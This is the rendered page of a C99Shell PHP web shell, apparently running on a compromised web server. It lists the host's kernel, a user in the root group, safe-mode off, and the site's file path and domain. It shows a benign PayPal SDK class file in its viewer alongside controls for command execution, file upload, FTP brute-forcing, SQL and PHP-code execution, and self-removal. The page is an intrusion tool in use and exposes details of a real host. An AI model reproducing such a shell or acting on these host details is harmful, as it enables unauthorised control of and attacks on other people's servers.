!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/   drwxr-xr-x
Free 28.64 GB of 117.98 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     RelatedResources.php (2.43 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PayPal\Api;

use 
PayPal\Common\PayPalModel;

/**
 * Class RelatedResources
 *
 * Each one representing a financial transaction (Sale, Authorization, Capture, Refund) related to the payment.
 *
 * @package PayPal\Api
 *
 * @property \PayPal\Api\Sale          sale
 * @property \PayPal\Api\Authorization authorization
 * @property \PayPal\Api\Order         order
 * @property \PayPal\Api\Capture       capture
 * @property \PayPal\Api\Refund        refund
 */
class RelatedResources extends PayPalModel
{
    
/**
     * Sale transaction
     *
     * @param \PayPal\Api\Sale $sale
     *
     * @return $this
     */
    
public function setSale($sale)
    {
        
$this->sale $sale;
        return 
$this;
    }

    
/**
     * Sale transaction
     *
     * @return \PayPal\Api\Sale
     */
    
public function getSale()
    {
        return 
$this->sale;
    }

    
/**
     * Authorization transaction
     *
     * @param \PayPal\Api\Authorization $authorization
     *
     * @return $this
     */
    
public function setAuthorization($authorization)
    {
        
$this->authorization $authorization;
        return 
$this;
    }

    
/**
     * Authorization transaction
     *
     * @return \PayPal\Api\Authorization
     */
    
public function getAuthorization()
    {
        return 
$this->authorization;
    }

    
/**
     * Order transaction
     *
     * @param \PayPal\Api\Order $order
     *
     * @return $this
     */
    
public function setOrder($order)
    {
        
$this->order $order;
        return 
$this;
    }

    
/**
     * Order transaction
     *
     * @return \PayPal\Api\Order
     */
    
public function getOrder()
    {
        return 
$this->order;
    }

    
/**
     * Capture transaction
     *
     * @param \PayPal\Api\Capture $capture
     *
     * @return $this
     */
    
public function setCapture($capture)
    {
        
$this->capture $capture;
        return 
$this;
    }

    
/**
     * Capture transaction
     *
     * @return \PayPal\Api\Capture
     */
    
public function getCapture()
    {
        return 
$this->capture;
    }

    
/**
     * Refund transaction
     *
     * @param \PayPal\Api\Refund $refund
     *
     * @return $this
     */
    
public function setRefund($refund)
    {
        
$this->refund $refund;
        return 
$this;
    }

    
/**
     * Refund transaction
     *
     * @return \PayPal\Api\Refund
     */
    
public function getRefund()
    {
        return 
$this->refund;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--